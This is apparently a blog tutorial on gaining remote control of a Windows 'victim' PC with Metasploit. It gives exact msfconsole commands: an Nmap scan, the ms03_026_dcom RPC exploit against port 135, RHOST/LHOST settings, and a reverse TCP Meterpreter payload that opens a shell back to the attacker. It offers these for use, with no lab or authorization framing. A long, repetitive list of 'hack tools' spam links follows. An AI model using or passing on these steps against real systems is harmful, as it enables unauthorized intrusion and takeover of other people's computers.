Saturday, August 22, 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Read more
  1. Pentest Tools Website Vulnerability
  2. Nsa Hacker Tools
  3. How To Hack
  4. Hacker Tools Mac
  5. Hacker Tools Apk Download
  6. Hack Apps
  7. Wifi Hacker Tools For Windows
  8. Hack Tool Apk
  9. Nsa Hack Tools
  10. Hacker Tools Linux
  11. Hack Tools For Windows
  12. New Hacker Tools
  13. Wifi Hacker Tools For Windows
  14. Hack Tools For Windows
  15. Hacker Tools Hardware
  16. Hacker Tools Apk Download
  17. How To Install Pentest Tools In Ubuntu
  18. Hack Apps
  19. Hacker Tool Kit
  20. Pentest Tools Find Subdomains
  21. Hack Tools For Mac
  22. Hacker Tools List
  23. Hack Tools
  24. Android Hack Tools Github
  25. Android Hack Tools Github
  26. Hacker Hardware Tools
  27. Pentest Tools Subdomain
  28. Pentest Tools Framework
  29. Pentest Tools Windows
  30. Hack Tool Apk
  31. Growth Hacker Tools
  32. What Is Hacking Tools
  33. Best Hacking Tools 2020
  34. Hack Tools 2019
  35. Hacker Tools
  36. Beginner Hacker Tools
  37. Pentest Tools Nmap
  38. Hacker Tools
  39. Ethical Hacker Tools
  40. Hack Website Online Tool
  41. Hacking Tools Mac
  42. Hacking Tools Pc
  43. Hack Tools For Games
  44. Hacker Tools Windows
  45. Pentest Tools Linux
  46. Kik Hack Tools
  47. Tools 4 Hack
  48. Pentest Tools Website Vulnerability
  49. Pentest Tools Open Source
  50. Hack Tool Apk
  51. Pentest Tools Subdomain
  52. Pentest Tools Tcp Port Scanner
  53. Pentest Tools Open Source
  54. Pentest Box Tools Download
  55. Hacker Tools Linux
  56. Computer Hacker
  57. Best Hacking Tools 2020
  58. Hacking Tools For Windows Free Download
  59. Hack App
  60. Hacking Tools For Windows
  61. Physical Pentest Tools
  62. Hacking Tools 2020
  63. Hacker Security Tools
  64. Hacking Tools For Games
  65. Hacker Tool Kit
  66. Termux Hacking Tools 2019
  67. Hacker Tools
  68. Hacking Tools Usb
  69. Nsa Hacker Tools
  70. Game Hacking
  71. Hacking Tools For Windows 7
  72. Hacker Tools Apk
  73. Hack Tools For Games
  74. Hacker Tools Windows
  75. Pentest Automation Tools
  76. World No 1 Hacker Software
  77. Hacker Tools For Mac
  78. Pentest Tools Port Scanner
  79. Pentest Tools Url Fuzzer
  80. Hacker Tools
  81. Pentest Tools For Mac
  82. Hacker Tools For Ios
  83. Computer Hacker
  84. Hacker Search Tools
  85. Hack Tool Apk
  86. Hacker Tools Mac

No comments: